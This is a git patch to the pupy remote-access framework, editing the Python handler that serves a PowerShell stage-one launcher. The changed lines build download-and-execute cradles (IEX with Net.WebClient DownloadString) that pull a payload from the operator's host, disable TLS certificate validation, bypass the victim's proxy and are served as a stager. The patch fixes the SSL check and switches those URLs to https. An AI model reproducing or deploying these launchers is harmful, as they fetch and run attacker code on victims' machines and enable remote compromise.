From 98565a75ae85a7dd3d31a7e4549a3e21b05e5762 Mon Sep 17 00:00:00 2001 From: Dc3 Date: Sat, 11 Mar 2017 02:43:04 +0800 Subject: [PATCH] Fixed something,Add powershell exec using -Enc --- pupy/pupylib/payloads/ps1_oneliner.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/pupy/pupylib/payloads/ps1_oneliner.py b/pupy/pupylib/payloads/ps1_oneliner.py index 3c0440df..1bc28221 100644 --- a/pupy/pupylib/payloads/ps1_oneliner.py +++ b/pupy/pupylib/payloads/ps1_oneliner.py @@ -92,16 +92,16 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler): self.end_headers() if self.server.useTargetProxy == True: print colorize("[+] ","green")+"Stage 1 configured for using target's proxy configuration" - if not self.ssl: + if not self.server.ssl: launcher = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two) else: - launcher = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two) + launcher = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('https://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two) else: print colorize("[+] ","green")+"Stage 1 configured for NOT using target's proxy configuration" - if not self.ssl: + if not self.server.ssl: launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two) else: - launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two) + launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('https://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two) launcher = create_ps_command(launcher, force_ps32=True, nothidden=False) self.wfile.write(launcher) print colorize("[+] ","green")+"[Stage 1/2] Powershell script served !"